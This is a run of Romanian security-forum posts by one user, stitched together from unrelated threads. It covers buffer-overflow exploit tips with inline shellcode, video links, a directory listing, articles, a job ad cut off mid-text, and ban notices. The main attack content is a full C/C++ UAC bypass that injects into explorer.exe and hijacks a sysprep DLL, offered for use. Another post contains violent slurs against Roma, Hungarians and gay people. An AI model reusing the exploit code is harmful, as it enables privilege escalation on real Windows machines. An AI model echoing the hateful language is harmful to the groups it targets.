Nytro

Atentie la cateva aspecte: 1. Foarte important: buffer += ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52 \x1c\x8b\x42""\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\ x89\xc7\x03" "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\ x31\xed\x8b" "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\ xf2\x81\x7e" "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\ x66\x8b\x2c" "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\ x68\x79\x74" "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\ x89\xe1\xfe" "\x49\x0b\x31\xc0\x51\x50\xff\xd7") Nu stiu sca obervati, dar jegul de cod BB pune niste spatii de-am-pulea! Le scoateti inainte de a rula exploit-ul. 2. Dezactivati protectiile Dezactivati Stack Cookies, ASLR si DEP din setarile proiectului. 3. Atentie la variabilele locale Daca declarati cateva variabile locale in functie care apeleaza strcpy, datele puse pe stiva sunt mai multe. Asadar, cand faceti suprascrierea, in loc de "\x41" * 24 vezi avea mai mult de suprascris (un numar mai mare decat 24: poate 28, poate 32 poate mult mai mult). 4. strcpy_s Visual Studio genereaza warning daca folositi strcpy si va recomanda sa folositi strcpy_s. NU folositi strcpy_s in teste deoarece va preveni buffer overflow-ul.

Vedeti ca aveti ASLR pe Windows 7/8. NU dati reboot dupa ce gasiti adresa pentru jmp esp. Ruleaza pas cu pas in debugger si vezi ce se intampla la RETN, vezi ce se afla in varful stivei la RETN. PS: Stack-ul tau arata total diferit. Tu ai mult mai multe date pe stack, ceva pus de compilator acolo. Pune mai multi de AAAA. ESP-ul tau e xxxxF738 si AAAA-urii sunt la xxxxF788, deci e mai mult spatiu de suprascris. O sa ma uit si eu maine pe Win7, ca acum plec la bere.

Doua. Sau un milion. Depinde. Aplicatia de 10 MB poate sa contina 9MB de imagini. Poate sa contina 6 MB de informatii de debug. Poate sa contina 5 DLL-uri folosite, totalizand 8 MB. Poate sa fie linkata static, adica sa contina si codul librariilor folosite. Iti putem oferi o oarecare statistica daca ne dai executabilul. Putem verifica cat de mare e sectiunea de cod. DAR depinde prea multe lucruri. Daca e in .NET e alta poveste. Daca e in VB, e alta poveste. Daca e in C++, e posibil sa contina mult cod de runtime generat automat de catre compilator. Pune executabilul aici.

Mersi. Astept sa vad si eu cel putin o persoana care a incercat si a reusit. Sau care nu a reusit dar pe care sa o pot ajuta...

[h=1]Penetration Testing and Exploiting with Metasploit + Armitage + msfconsole[/h] Publicat pe 28 iul. 2013 In this Video we show you how to exploit machines with Metasploit, Armitage, and msfconsole. Thumbs up & Subscribe if you like it Links: Links: Facebook: http://www.facebook.com/Netsecnow Blog: Learn Network Security - NetSecNow Twitter: http://www.twitter.com/LearnNetSec Metasploit Guide: http://www.offensive-security.com/met... Sursa:

[h=1]Basics of Penetration Testing by KernelMeltdown.org[/h] Publicat pe 28 oct. 2012 Kernel Meltdown I recorded my workshop last Thursday on this talk, but not surprisingly, the recording did not save! I decided to do the talk and demo again on my own and record it for everyone to enjoy... I did not anticipate it to be over 40 minutes, so I apologize for that, but here you go! Feedback is greatly appreciate it. Otherwise, I would not know what to change to make them better. You can get the powerpoint presentation here: http://kernelmeltdown.org/blog/offens...

[h=2]Index of /[/h] [TABLE] [TR] [TH][/TH] [TH]Name[/TH] [TH]Last modified[/TH] [TH]Size[/TH] [TH]Description[/TH] [/TR] [TR] [TH=colspan: 5] [/TH][/TR] [TR] [TD][/TD] [TD]Cryptography/[/TD] [TD=align: right]24-Jan-2014 17:49 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Embedded/[/TD] [TD=align: right]18-Mar-2014 00:59 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Forensic/[/TD] [TD=align: right]18-Mar-2014 01:00 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Lockpicking/[/TD] [TD=align: right]18-Mar-2014 01:01 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Magazines/[/TD] [TD=align: right]13-Jun-2014 13:47 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Network n Security/[/TD] [TD=align: right]18-Mar-2014 01:01 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Other/[/TD] [TD=align: right]30-Jul-2014 17:38 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Programming/[/TD] [TD=align: right]03-Jun-2014 11:40 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Reverse Engineering/[/TD] [TD=align: right]06-May-2014 16:20 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_Hacker_Files_Comic.zip[/TD] [TD=align: right]08-Dec-2013 11:36 [/TD] [TD=align: right]111M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Todo/[/TD] [TD=align: right]18-Mar-2014 01:01 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Tools/[/TD] [TD=align: right]26-May-2014 17:58 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Windows/[/TD] [TD=align: right]18-Mar-2014 01:02 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Wordlists/[/TD] [TD=align: right]24-Jan-2014 18:02 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]bootnets/[/TD] [TD=align: right]18-Mar-2014 01:02 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]ebooks/[/TD] [TD=align: right]21-Jul-2014 18:24 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]expl0it/[/TD] [TD=align: right]24-Jan-2014 17:56 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]neuromancer.txt[/TD] [TD=align: right]08-Dec-2013 11:36 [/TD] [TD=align: right]532K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]unix/[/TD] [TD=align: right]18-Mar-2014 01:02 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TH=colspan: 5] [/TH][/TR] [/TABLE] Link: Index of /

A dye pack is a radio-controlled incendiary device used by some banks to preemptively foil a bank robbery by causing stolen cash to be permanently marked with dye shortly after a robbery. In most cases, a dye pack is placed in a hollowed-out space within a stack of banknotes, usually $10 or $20 bills. This stack of bills looks and feels similar to a real one, with technology allowing for the manufacturing of flexible dye packs which are difficult to detect by handling the stack.[1] When the marked stack of bills is not used, it is stored next to a magnetic plate near a bank cashier, in standby or safe mode, ready to be handed over to a potential robber by a bank employee. When it is removed from the magnetic plate, the pack is armed, and once it leaves the building and passes through the door frame, a radio transmitter located at the door will trigger a timer (typically 10 seconds), after which the dye pack will explode and release an aerosol (usually of Disperse Red 9) and sometimes tear gas, intended to permanently stain and destroy the stolen money and mark the robber's body with a bright red color. The chemical reaction causing the explosion of the pack and the release of the dye creates high temperatures of about 200 °C (392 °F) which further discourages a criminal from touching the pack or removing it from the bag or getaway vehicle.[1] Dye packs are used in over 75% of banks in America.[2]

Sunt CV-uri. Nota: Adobe Reader imi crapa in EMET 5. Patiti la fel? Edit: Era de la mine.

[h=1][C/C++] UAC Bypass[/h][h=3]mh4x0f[/h] /* UAC Bypass for Windows 7 RTM, SP1 / Windows 8 DP, CP all 32-bit for admin with default UAC settings Effectively bypasses the UAC rights, because of: 1. "auto-elevation" for certain processes started from explorer.exe 2. anyone can inject anything to explorer.exe This was reported to Microsoft multiple times (months ago) and they are too lame to fix injection to explorer.exe. I've followed the responsible disclosure guidelines, no need to get angry on me. TDL4 is using the bypass for 64-bit already. © 2012 K. Kleissner, Published under EUPL - Take it, use it. Implement it as below, be aware the code makes a copy of itself (the "own" exe) and changes it to be a dll (so be aware of the WinMain -> DllMain entry point implications!). int UACBypass(); int main() { OSVERSIONINFO VersionInfo; VersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); GetVersionEx(&VersionInfo); // Windows 7, 8: Try injecting into auto-elevated process if admin and UAC is on default (prompts 2 times on guest with credential UI so you should add a check for guest) if (VersionInfo.dwMajorVersion == 6 && (VersionInfo.dwMinorVersion == 1 || VersionInfo.dwMinorVersion == 2) && !IsUserElevatedAdmin()) UACBypass(); // ... your code here ... } BOOL IsUserElevatedAdmin() { SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY; PSID SecurityIdentifier; if (!AllocateAndInitializeSid(&NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &SecurityIdentifier)) return 0; BOOL IsAdminMember; if (!CheckTokenMembership(NULL, SecurityIdentifier, &IsAdminMember)) IsAdminMember = FALSE; FreeSid(SecurityIdentifier); return IsAdminMember; } */ // WARNING: This code leaves crytpbase.dll in sysprep directory! // This is cleaned up and heavily modified code from originally http://www.pretentiousname.com/misc/win7_uac_whitelist2.html (Win7Elevate_Inject) #define _HAS_EXCEPTIONS 0 #include <windows.h> #include <commctrl.h> #include <shlobj.h> #include <psapi.h> struct InjectArgs { // Functions BOOL (WINAPI *FFreeLibrary)(HMODULE hLibModule); HMODULE (WINAPI *FLoadLibrary)(LPCWSTR lpLibFileName); FARPROC (WINAPI *FGetProcAddress)(HMODULE hModule, LPCSTR lpProcName); BOOL (WINAPI *FCloseHandle)(HANDLE); DWORD (WINAPI *FWaitForSingleObject)(HANDLE,DWORD); // Static strings wchar_t szSourceDll[MAX_PATH]; wchar_t szElevDir[MAX_PATH]; wchar_t szElevDll[MAX_PATH]; wchar_t szElevDllFull[MAX_PATH]; wchar_t szElevExeFull[MAX_PATH]; wchar_t szElevArgs[MAX_PATH]; wchar_t szEIFOMoniker[MAX_PATH]; // szElevatedIFileOperationMoniker // some GUIDs IID pIID_EIFO; IID pIID_ShellItem2; IID pIID_Unknown; // Dll and import strings wchar_t NameShell32[20]; wchar_t NameOle32[20]; char NameCoInitialize[20]; char NameCoUninitialize[20]; char NameCoGetObject[20]; char NameCoCreateInstance[20]; char NameSHCreateItemFromParsingName[30]; char NameShellExecuteExW[20]; // IMPORTANT: Allocating structures here (so we know where it was allocated) SHELLEXECUTEINFO shinfo; BIND_OPTS3 bo; }; // important: error code here is passed back to original process (1 = success, 0 = failure) static DWORD WINAPI RemoteCodeFunc(InjectArgs * Args) { // don't rely on any static data here as this function is copied alone into remote process! (we assume at least that kernel32 is at same address) NTSTATUS Status = 0; // Use an elevated FileOperation object to copy a file to a protected folder. // If we're in a process that can do silent COM elevation then we can do this without any prompts. HMODULE ModuleOle32 = Args->FLoadLibrary(Args->NameOle32); HMODULE ModuleShell32 = Args->FLoadLibrary(Args->NameShell32); if (!ModuleOle32 || !ModuleShell32) return 0; // Load the non-Kernel32.dll functions that we need. HRESULT (WINAPI * FCoInitialize)(LPVOID pvReserved) = (HRESULT (WINAPI * )(LPVOID pvReserved))Args->FGetProcAddress(ModuleOle32, Args->NameCoInitialize); void (WINAPI * FCoUninitialize)(void) = (void (WINAPI * )(void))Args->FGetProcAddress(ModuleOle32, Args->NameCoUninitialize); HRESULT (WINAPI * FCoGetObject)(LPCWSTR pszName, BIND_OPTS *pBindOptions, REFIID riid, void **ppv) = (HRESULT (WINAPI * )(LPCWSTR pszName, BIND_OPTS *pBindOptions, REFIID riid, void **ppv))Args->FGetProcAddress(ModuleOle32, Args->NameCoGetObject); HRESULT (WINAPI * FCoCreateInstance)(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, void ** ppv) = (HRESULT (WINAPI * )(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, void ** ppv))Args->FGetProcAddress(ModuleOle32, Args->NameCoCreateInstance); HRESULT (WINAPI * FSHCreateItemFromParsingName)(PCWSTR pszPath, IBindCtx *pbc, REFIID riid, void **ppv) = (HRESULT (WINAPI * )(PCWSTR pszPath, IBindCtx *pbc, REFIID riid, void **ppv))Args->FGetProcAddress(ModuleShell32, Args->NameSHCreateItemFromParsingName); BOOL (WINAPI * FShellExecuteEx)(LPSHELLEXECUTEINFOW lpExecInfo) = (BOOL (WINAPI * )(LPSHELLEXECUTEINFOW lpExecInfo))Args->FGetProcAddress(ModuleShell32, Args->NameShellExecuteExW); if (!FCoInitialize || !FCoUninitialize || !FCoGetObject || !FCoCreateInstance || !FSHCreateItemFromParsingName || !FShellExecuteEx || FCoInitialize(NULL) != S_OK) return 0; Args->bo.cbStruct = sizeof(BIND_OPTS3); Args->bo.dwClassContext = CLSCTX_LOCAL_SERVER; // For testing other COM objects/methods, start here. IFileOperation *pFileOp = 0; IShellItem *pSHISource = 0; IShellItem *pSHIDestination = 0; IShellItem *pSHIDelete = 0; // This is a completely standard call to IFileOperation, if you ignore all the pArgs/func-pointer indirection. if (FCoGetObject(Args->szEIFOMoniker, &Args->bo, Args->pIID_EIFO, reinterpret_cast< void ** >(&pFileOp)) == S_OK && pFileOp && pFileOp->SetOperationFlags(FOF_NOCONFIRMATION|FOF_SILENT|FOFX_SHOWELEVATIONPROMPT|FOFX_NOCOPYHOOKS|FOFX_REQUIREELEVATION|FOF_NOERRORUI) == S_OK && // FOF_NOERRORUI is important here to not show error messages, copying fails on guest (takes wrong path) FSHCreateItemFromParsingName( Args->szSourceDll, NULL, Args->pIID_ShellItem2, reinterpret_cast< void ** >(&pSHISource)) == S_OK && pSHISource && FSHCreateItemFromParsingName( Args->szElevDir, NULL, Args->pIID_ShellItem2, reinterpret_cast< void ** >(&pSHIDestination)) == S_OK && pSHIDestination && pFileOp->CopyItem(pSHISource, pSHIDestination, Args->szElevDll, NULL) == S_OK && pFileOp->PerformOperations() == S_OK) { // Use ShellExecuteEx to launch the "part 2" target process. Again, a completely standard API call. // (Note: Don't use CreateProcess as it seems not to do the auto-elevation stuff.) Args->shinfo.cbSize = sizeof(SHELLEXECUTEINFO); Args->shinfo.fMask = SEE_MASK_NOCLOSEPROCESS; Args->shinfo.lpFile = Args->szElevExeFull; Args->shinfo.lpParameters = Args->szElevArgs; Args->shinfo.lpDirectory = Args->szElevDir; Args->shinfo.nShow = SW_SHOW; // update: we assume the cryptbase.dll deletes itself (no waiting for syspreps execution although it would be possible) if ((Status = FShellExecuteEx(&Args->shinfo))) { Args->FCloseHandle(Args->shinfo.hProcess); } } // clean-up if (pSHIDelete) { pSHIDelete->Release(); } if (pSHIDestination) { pSHIDestination->Release(); } if (pSHISource) { pSHISource->Release(); } if (pFileOp) { pFileOp->Release(); } FCoUninitialize(); Args->FFreeLibrary(ModuleShell32); Args->FFreeLibrary(ModuleOle32); return Status; } // returns 1 when you can expect everything worked fine! int AttemptOperation(bool bInject, HANDLE TargetProcess, const wchar_t *szPathToOurDll) { NTSTATUS Status = 0; const BYTE * codeStartAdr = (BYTE *)RemoteCodeFunc; const BYTE * codeEndAdr = (BYTE *)AttemptOperation; if (codeStartAdr >= codeEndAdr) // ensure we don't copy crap return 0; // Here we define the target process and DLL for "part 2." This is an auto/silent-elevating process which isn't // directly below System32 and which loads a DLL which is directly below System32 but isn't on the OS's "Known DLLs" list. // If we copy our own DLL with the same name to the exe's folder then the exe will load our DLL instead of the real one. // set up arguments InjectArgs ia; memset(&ia, 0, sizeof(ia)); ia.FFreeLibrary = FreeLibrary; ia.FLoadLibrary = LoadLibrary; ia.FGetProcAddress = GetProcAddress; ia.FCloseHandle = CloseHandle; ia.FWaitForSingleObject = WaitForSingleObject; wcscpy(ia.NameShell32, L"shell32.dll"); wcscpy(ia.NameOle32, L"ole32.dll"); strcpy(ia.NameCoInitialize, "CoInitialize"); strcpy(ia.NameCoUninitialize, "CoUninitialize"); strcpy(ia.NameCoGetObject, "CoGetObject"); strcpy(ia.NameCoCreateInstance, "CoCreateInstance"); strcpy(ia.NameSHCreateItemFromParsingName, "SHCreateItemFromParsingName"); strcpy(ia.NameShellExecuteExW, "ShellExecuteExW"); wchar_t SystemDirectory[MAX_PATH]; if (!GetSystemDirectory(SystemDirectory, MAX_PATH)) return 0; wcscpy(ia.szSourceDll, szPathToOurDll); wcscpy(ia.szElevDir, SystemDirectory); wcscat(ia.szElevDir, L"\\sysprep"); wcscpy(ia.szElevDll, L"CRYPTBASE.dll"); wcscpy(ia.szElevExeFull, SystemDirectory); wcscat(ia.szElevExeFull, L"\\sysprep\\sysprep.exe"); wcscpy(ia.szEIFOMoniker, L"Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}"); memcpy(&ia.pIID_EIFO, &__uuidof(IFileOperation), sizeof(GUID)); memcpy(&ia.pIID_ShellItem2, &__uuidof(IShellItem2), sizeof(GUID)); memcpy(&ia.pIID_Unknown, &__uuidof(IUnknown), sizeof(GUID)); if (!bInject) { // Test code without remoting. // This should result in a UAC prompt, if UAC is on at all and we haven't been launched as admin. Status = RemoteCodeFunc(&ia); } else { // Test code with remoting. // At least as of RC1 build 7100, with the default OS settings, this will run the specified command // with elevation but without triggering a UAC prompt. void * RemoteArgs = VirtualAllocEx(TargetProcess, 0, sizeof(ia), MEM_COMMIT, PAGE_READWRITE); if (!RemoteArgs || !WriteProcessMemory(TargetProcess, RemoteArgs, &ia, sizeof(ia), NULL)) return 0; void * RemoteCode = VirtualAllocEx(TargetProcess, 0, codeEndAdr - codeStartAdr, MEM_COMMIT, PAGE_EXECUTE_READ); if (!RemoteCode || !WriteProcessMemory(TargetProcess, RemoteCode, RemoteCodeFunc, codeEndAdr - codeStartAdr, NULL)) return 0; HANDLE hRemoteThread = CreateRemoteThread(TargetProcess, NULL, 0, (LPTHREAD_START_ROUTINE)RemoteCode, RemoteArgs, 0, NULL); if (!hRemoteThread) return 0; // intelligent logit to wait for the execution and grabbing the exit code DWORD dwWaitRes = WaitForSingleObject(hRemoteThread, 40000); if (dwWaitRes == WAIT_OBJECT_0) GetExitCodeThread(hRemoteThread, (DWORD *)&Status); CloseHandle(hRemoteThread); } return Status; } int UACBypass() { // Step 1: find explorer.exe process we can inject to (to-do: maybe using some other process?) DWORD Processes[1024], BytesReturned; if (!EnumProcesses(Processes, sizeof(Processes), &BytesReturned)) return 0; HANDLE TargetProcess = NULL; for (unsigned i = 0; i < BytesReturned / 4; i++) { if (Processes != 0) { TargetProcess = OpenProcess(/*PROCESS_QUERY_INFORMATION | PROCESS_VM_READ*/PROCESS_ALL_ACCESS, FALSE, Processes); // Get the process name. if (TargetProcess) { HMODULE hMod; DWORD cbNeeded; if (EnumProcessModules(TargetProcess, &hMod, sizeof(hMod), &cbNeeded) ) { wchar_t ProcessName[MAX_PATH]; GetModuleBaseName(TargetProcess, hMod, ProcessName, sizeof(ProcessName)/sizeof(TCHAR) ); if (_wcsicmp(ProcessName, L"explorer.exe") == 0) break; } CloseHandle(TargetProcess); TargetProcess = NULL; } } } if (!TargetProcess) return 0; // Step 2: Creating fake cryptbase.dll that is this exe with the IMAGE_FILE_DLL flag set in PE header wchar_t SelfFileName[MAX_PATH]; if (!GetModuleFileNameW(NULL, SelfFileName, MAX_PATH)) { CloseHandle(TargetProcess); return 0; } wchar_t FakeCrytbase[MAX_PATH]; GetTempPathW(MAX_PATH, FakeCrytbase); GetTempFileNameW(FakeCrytbase, L"tmp", 0, FakeCrytbase); if (!CopyFile(SelfFileName, FakeCrytbase, 0)) { CloseHandle(TargetProcess); return 0; } HANDLE FakeFile = CreateFileW(FakeCrytbase, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); if (FakeFile == INVALID_HANDLE_VALUE) { CloseHandle(TargetProcess); return 0; } DWORD NumberOfBytesRead; BYTE ImageHeader[4096]; if (!ReadFile(FakeFile, ImageHeader, 4096, &NumberOfBytesRead, NULL)) { CloseHandle(TargetProcess); CloseHandle(FakeFile); return 0; } PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)ImageHeader; PIMAGE_NT_HEADERS old_header = (PIMAGE_NT_HEADERS)&((const unsigned char *)(ImageHeader))[dos_header->e_lfanew]; // set the dll flag (IMAGE_FILE_DLL) old_header->FileHeader.Characteristics |= IMAGE_FILE_DLL; DWORD NumberOfBytesWritten; if (SetFilePointer(FakeFile, 0, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER || !WriteFile(FakeFile, ImageHeader, 4096, &NumberOfBytesWritten, NULL)) { CloseHandle(TargetProcess); CloseHandle(FakeFile); return 0; } CloseHandle(FakeFile); // Step 3: Using the exploit NTSTATUS Status = AttemptOperation(1, TargetProcess, FakeCrytbase); CloseHandle(TargetProcess); DeleteFile(FakeCrytbase); // exit if we can assume that the elevation worked correctly, and this executable was started with auto-elevated rights if (Status) ExitProcess(1); return 1; } Sursa: [C/C++] UAC Bypass - Source Codes - rohitab.com - Forums

OWASP Romania InfoSec Conference 2014 este o conferinta de o zi pe teme de securitate si hacking ce va avea loc pe 24 octombrie 2014 in Bucuresti. De ce sa sposorizez? Veti fi alaturi de 200+ leaderi, consultanti de securitate, arhitecti de securitate si programatori veniti sa schimbe idei despre initiative si noutatile tehnologice. Evenimentele OWASP atrag o audienta interesata de "What's next?" in securitatea IT - Sponsorul va fi promovat ca raspuns la aceasta intrebare. Cresterea gradului de constientizare si recunoasterea in comunitatea de securitate IT din Romania Sustineti si jucati un rol activ in lumea pasionatilor de securitate a informatiei. OWASP Romania InfoSec Conference 2014 is a one day security and hacking conference. It will take place on 24th of October, 2014 - Bucharest, Romania. Why sponsor? Join 200+ leaders, security consultants, security architects and developers gathered to share cutting-edge ideas, initiatives and trends in technology. OWASP events attract an audience interested in "What's next?" - As a sponsor, you will be promoted as an answer to this question. Increase awareness and recognition in the Romanian Security IT environment. Support and involvement in the world of information security enthusiasts.

Mugur Isarescu presedinte. Puie Monta!

Salut, Iti inteleg opiniile si sunt total de acord cu ele: ma pis pe tigani, unguri si homosexuali. DAR acesta este un forum de securitate IT. Aici discutam despre calculatoare. Poate si eu, de multe ori, vreau sa atrag atentia lumii asupra ciorilor, insa ma abtin pentru ca aici nu este locul potrivit pentru astfel de discutii. De asemenea, nu cred ca exista persoane in staff care sa agreeze aceste specimene. Cu totii ii uram, dar purtand niste discutii pe forum nu rezolvam nimic. Acest forum e pentru discutii legate de IT, atat. In alta ordine de idei, e ok sa deschizi 2-3 subiecte legate de aceste aspecte, insa nu prea le vad rostul aici. Lumea intra aici (sau cel putin asa ar trebui) sa vada ce mai e nou in domeniu, sa citeasca un tutorial sau sa urmareasca un videoclip. Sunt satul de cati tigani vad pe strada sau la TV, nu vreau sa vad si pe forum. Nu vreau sa vad si pe RST ca unguru' pulii vrea autonomie pentru ca imi creste pulsul dorindu-i moartea si nu face bine la sanatate. Concluzia e simpla: nu mai posta astfel de subiecte aici. Apoi, in legatura cu limbajul, e ok sa iti bagi pula in mortii si ranitii ungurilor si tiganilor, insa NU e ok sa faci acest lucru la adresa membrilor. Nu tinem cont de limbaj, dar nu toleram atacurile la persoana. Cu totii avem momente cand ne enervam, dar daca ne bagam pula intr-un moderator nu ne ajuta cu nimic, poate doar ne simtim 5 secunde mai bine. Noi te intelegem pe tine, sper sa ne intelegi si tu pe noi.

IBM SyNAPSE TrueNorth, creierul uman într-o pastil? de siliciu Dorian Prodan - 8 aug 201 Acum trei ani, IBM Research ?i universitatea Cornell au prezentat primul prototip al procesorului Systems of Neuromorphic Adaptive Plastic Scalable Electronics (SyNAPSE) ?i interesanta arhitectur? intern? a acestuia care imit? re?eaua neuronal? a creierului uman. Îmbun?t??it ?i eficientizat, procesorul SyNAPSE a evoluat, iar primul produs finit din aceast? gam? este preg?tit s? intre în produc?ie: TrueNorth.. Cercet?torii în domeniul inteligen?ei artificiale experimenteaz? de foarte mult? vreme cu solu?ii software din ce în ce mai avansate, îns? dezvoltatorii SyNAPSE consider? c? abordarea acestei dificile probleme cu ajutorul sistemelor de calcul obi?nuite este ineficient?. Dac? sistemele de calcul actuale ofer? capacit??i brute de procesare care dep??esc limitele creierului uman, acestea sunt îns? incapabile s? imite eficient fine?ea interconexiunilor neuronale care stau la baza gândirii independente ?i a con?tiin?ei. Acolo unde procesoarele actuale dau gre?, IBM Research ?i Cornell afirm? c? SyNAPSE str?luce?te. Noul procesor are 5,4 miliarde de tranzistori care sunt organiza?i în 4096 de nuclee, aceast? structur? fiind organizat? logic într-un milion de neuroni artificiali ?i 256 de milioane de sinapse. Fiecare dintre aceste nuclee are o capacitate de stocare de peste 100.000 de bi?i ?i un set de leg?turi sinaptice cu nucleele adiacente, ceea ce-i permite s? stocheze ?i s? proceseze informa?ii în acela?i spa?iu de memorie, s? ?in? minte neuronii de la care a primit sau c?tre care a trimis date ?i s? aprecieze puterea interconexiunilor, la fel ca un creier uman. Fiecare nucleu con?ine ?i hardware-ul necesar pentru adresarea unui neuron specific dintr-un alt nucleu, datele fiind generate în rafal? ?i fiind trimise prin re?eaua comun? sinaptic? din nod în nod pân? la destina?ie. Atunci când un nucleu nu are nimic de procesat, acesta se opre?te, iar acest mod de func?ionare asincron se reflect? ?i în eficien?a energetic? superioar?. Fabricat de c?tre Samsung într-un proces tehnologic pe 28 de nanometri, procesorul SyNAPSE TrueNorth func?ioneaz? la o frecven?? de numai 1 KHz ?i are un consum energetic infim de 70 mW. Aceste procesoare pot fi grupate la rândul lor în unit??i de procesare mai puternice, IBM afirmând c? saltul tehnologic este cople?itor: un sistem care poate fi ?inut în palm? ofer? puterea de procesare a unui rack întreg de sisteme de calcul tradi?ionale, iar testele energetice comparative au ar?tat c? SyNAPSE TrueNorth este de 176.000 de ori mai eficient decât un sistem de calcul standard ?i de 7000 de ori mai eficient decât un hardware specializat actual. Problema cea mai mare a noului procesor este oferta software s?rac? din acest moment. Implementarea hardware SyNAPSE a pornit de la fundamentul unei solu?ii software numit? Compass, iar toate aplica?iile Compass sunt compatibile cu TrueNorth. Pentru a pune în valoarea acest procesor în toate domeniile posibile, IBM ?i restul companiilor interesate vor trebui s? dezvolte solu?ii software mai complexe ?i mai variate. Compania crede îns? c? momentul în care vom vedea implement?ri cu sute de mii de nuclee, sute de milioane de neuroni ?i sute de miliarde de sinapse va sosi într-un viitor apropiat, iar acest lucru va revolu?iona întreaga industrie IT. Sursa: IBM SyNAPSE TrueNorth, creierul uman într-o pastil? de siliciu

Tepar. Topic inchis.

Ne-am lamurit. Esti tepar. Ban permanent.

Daca e cineva care doreste sa sustina o prezentare, ma poate contacta. Daca e cineva care poate gasi o sponsorizare, la firma care lucreaza de exemplu, il rog sa ma contacteze.

[h=4]Application Security Analyst[/h] Req. Number: 37027 Location Information: Bucharest, BUCHAREST, Romania We’re EA—the world’s largest video game publisher. You’re probably familiar with many of our titles—Madden, FIFA, The Sims, Need for Speed, Dead Space, Battlefield and Star Wars, to name a few. But maybe you don’t know how we’re committed to creating games for every platform—from social to mobile to console—to give our consumers that anytime, anywhere access they demand. What does that mean for you? It means more opportunities to unleash your creative genius, be inspired by those around you and ignite your path in any direction you choose. Application Security Specialist & Penetration Tester Summary: The Application Security Specialist and Penetration Tester is a member of the RedTeam within the Security and Risk Management (SRM) group, which provides security governance and support for EA’s business worldwide. We see the Application Security Specialist and Penetration Tester as a special breed of security consultant that tries to break into or find possible exploits in different computer systems and software. Some might call this position ethical hacker, what we’re looking for is a truly gifted, security minded hacker. You will be expected to find and exploit vulnerabilities in EA’s applications and infrastructure and fill out assessment reports to detail the findings. While you will often be running pre-determined types of tests based on industry standards, you will also be designing your own tests a large portion of the time, which requires creativity and imagination, along with a superb level of technical knowledge. With these tests and assessments, you'll be conducting regular security audits from both a logical/theoretical and a technical/hands-on standpoint. By identifying which flaws can be exploited to cause business risk, you will provide crucial insights into the most pressing issues and suggests how to prioritize security resources. The main focuses for this role are: To conduct dynamic application security analysis on a multitude of platforms: PC, web, mobile and consoles To exploit security flaws and vulnerabilities with attack simulations on multiple projects working against specific focused scopes of work To perform infrastructure security assessments (network and server side related security tasks) To advise and consult with EA staff in order to reduce risks To provide relevant metrics (improve existing and develop new ones) that allow the general business and SRM to understand risk as it pertains to the business and products Solve complex technical problems and articulate to non-IT personnel Perform, review and analyze security vulnerability data to identify applicability and false positives Research and develop testing tools, techniques, and process improvements Teach, learn and develop the skillset with the RedTeam In addition the successful candidate will: Have the ability to flow from black box to gray box to white box tests Work with product teams as well as core IT applications, infrastructure and operations to enhance the security of the corporation; communication and exposure to the management team will be required for this role Provide SRM with information necessary to improve security throughout the organization in SRM’s ongoing programs such as Security Awareness Enhance the existing library of development examples and materials to improve integrating security into the Software Development Life-Cycle (SDLC) Write guidelines and best practices from penetration test findings so teams can follow best practices on future development efforts Job required knowledge, skills and abilities: Relevant similar experience Very good understanding of OWASP Top 10 Experience with the inner workings and security aspects of variety of Application Servers, Web Servers, Media/Content Servers, Messaging Servers, Database Servers, and Integration Servers Excellent networking skills in multiple environments Experience with multiple Layer 7 intercepting proxies Knowledge of recognized security industry standards and best practices such as OWASP Testing Project, OSSTMM, PCI DSS, ISO 27000 set Good understanding of application development in multiple languages such as ASP.NET, Java, C/C++, and common scripting languages Excellent verbal, written, and interpersonal skills and professionalism in dealing with all levels of management and staff Additional, nice to have, skills and education: Bachelor’s degree in 